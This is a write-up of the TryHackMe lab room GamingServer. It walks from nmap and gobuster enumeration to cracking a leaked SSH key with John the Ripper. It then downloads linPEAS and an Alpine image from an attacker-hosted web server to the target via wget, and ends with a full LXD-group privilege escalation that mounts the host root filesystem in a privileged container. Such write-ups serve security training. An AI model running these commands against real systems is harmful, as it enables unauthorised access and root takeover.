TryHackMe GamingServer Writeup

This is a writeup for TryHackMe room GamingServer.

TryHackMe | GamingServer

NMAP

10.10.133.120 is our ip address.

nmap 10.10.133.120

nmap results

Gobuster

gobuster dir -u 10.10.133.120 -w ./gobusterDir.txt

gobuster results for 10.10.133.120

Webpage Inspection

As I was looking for clues at webpage, I found that someone left a comment line and it mentions about john. He might be an user for us to try for SSH.

webpage source codes

http://10.10.133.120/secret/

As gobuster shows us there is a secret page and I found a RSA key named secretKey.

SSH

Now we can crack the RSA key we found earlier. I will create a new file, name it rsaid and paste the key in that file. Lets open JTR and convert the key to txt file so that John could crack it.

/usr/share/john/ssh2john.py rsaid > rsaid.txt

john rsaid.txt --wordlist=rockyou.txt

jtr results

We can connect using SSH now but first I will give 600 permission to our rsaid file.

Lets connect with our RSA key and password that we found.

ssh -i 'rsaid' john@10.10.133.120

ssh login

User Flag

We logged in succesfully. Now lets search user flag. It is probably named as user.txt so I will search it directly.

searching for user flag

Well, the flag was in our directory. I opened it obtained the flag.

Privilege Escalation and Root Flag

Now we need a way to gain root access. We can use LinPeas for our purpose.

PEASS-ng/linPEAS at master · peass-ng/PEASS-ng (github.com)

First lets host a python web server on our machine in the folder where Linpeas file located.

sudo python3 -m http.server 80 

hosting local server

We can use wget on target machine and retrieve linpeas.sh file.

wget yourip:port/linpeas.sh

transferring linpeas file

Lets give our file chmod +x and run it.

linpeas

Seems like we are in lxd group. So we can use this and gain root access. Starting with downloading lxd alpine builder to our local machine.

saghul/lxd-alpine-builder: Build Alpine Linux images for LXD (github.com)

Lets download build-alpine file and execute it. This should create a compressed file.

We can host a remote server same way we did before.

python -m http.server

Lets contiune from our target host. Download our file from our server via wget command.

wget yourip:yourport/alpine-v3.20-x86_64-20240710_1606.tar.gz

Now we can run the following commands and get root access.

lxc image import ./alpine-v3.20-x86_64-20240710_1606.tar.gz

lxc image list

lxc init 11e9cf25a267 ignite -c security.privileged=true

lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true

lxc start ignite

lxc exec ignite /bin/sh

Now we can go to cd /mnt/root/root/ and obtain the flag.